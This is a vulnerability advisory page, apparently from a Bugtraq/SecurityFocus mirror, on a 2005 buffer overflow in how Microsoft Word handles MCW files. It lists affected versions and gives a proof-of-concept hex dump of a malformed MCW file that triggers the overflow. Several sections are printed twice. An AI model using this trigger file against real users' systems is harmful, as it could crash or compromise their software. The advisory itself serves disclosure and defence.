Microsoft Word MCW File Handler Buffer Overflow Vulnerability
BID:13687
Info
Microsoft Word MCW File Handler Buffer Overflow Vulnerability
| Bugtraq ID: | 13687 |
| Class: | Boundary Condition Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | May 19 2005 12:00AM |
| Updated: | May 19 2005 12:00AM |
| Credit: | Discovery of this issue is credited to Bahaa Naamneh <[email protected]>. |
| Vulnerable: |
Microsoft Word 98(J) SR2 Microsoft Word 98(J) SR1 Microsoft Word 98(J) Microsoft Word 98 Microsoft Word 97 SR2 Microsoft Word 97 SR1 Microsoft Word 97 Microsoft Word 95 Microsoft Word 2002 SP2 Microsoft Word 2002 SP1 Microsoft Word 2002 Microsoft Word 2001 for Mac Microsoft Word 2000 SR1a Microsoft Word 2000 SR1 Microsoft Word 2000 SP3 Microsoft Word 2000 SP2 Microsoft Word 2000 |
| Not Vulnerable: | |
Discussion
Microsoft Word MCW File Handler Buffer Overflow Vulnerability
Microsoft Word is prone to a buffer overflow vulnerability. The issue manifests when a '.mcw' (MacWrite II/MS Word for Macintosh) file is processed.
It is conjectured that this issue may be exploited to execute arbitrary code in the context of a user that processes a malicious file with the affected software.
Microsoft Word is prone to a buffer overflow vulnerability. The issue manifests when a '.mcw' (MacWrite II/MS Word for Macintosh) file is processed.
It is conjectured that this issue may be exploited to execute arbitrary code in the context of a user that processes a malicious file with the affected software.
Exploit / POC
Microsoft Word MCW File Handler Buffer Overflow Vulnerability
The following example is available; this example is a hexadecimal representation of an MCW doc sufficient to trigger the issue:
c6 2e 82 05 a0 07 08 05 a0 07 08 00 00 02 d0 42
00 00 01 00 01 00 01 00 00 00 00 00 00 00 00 00
11 04 74 65 73 74 41 41 41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41 41 41 00 06 20 42 61 68
61 61 00 00 00 09 00 00 00 00 0f 54 69 6d 65 73
Currently we are not aware of any exploits for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
The following example is available; this example is a hexadecimal representation of an MCW doc sufficient to trigger the issue:
c6 2e 82 05 a0 07 08 05 a0 07 08 00 00 02 d0 42
00 00 01 00 01 00 01 00 00 00 00 00 00 00 00 00
11 04 74 65 73 74 41 41 41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
41 41 41 41 41 41 41 41 41 41 00 06 20 42 61 68
61 61 00 00 00 09 00 00 00 00 0f 54 69 6d 65 73
Currently we are not aware of any exploits for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
Solution / Fix
Microsoft Word MCW File Handler Buffer Overflow Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
References
Microsoft Word MCW File Handler Buffer Overflow Vulnerability
References:
References:
- Technet Security (Microsoft)
- [UPDATE] UNICODE BUFFER OVERFLOW IN MS-WORD (Bahaa Naamneh
) - UNICODE BUFFER OVERFLOW IN MS-WORD (Bahaa Naamneh
)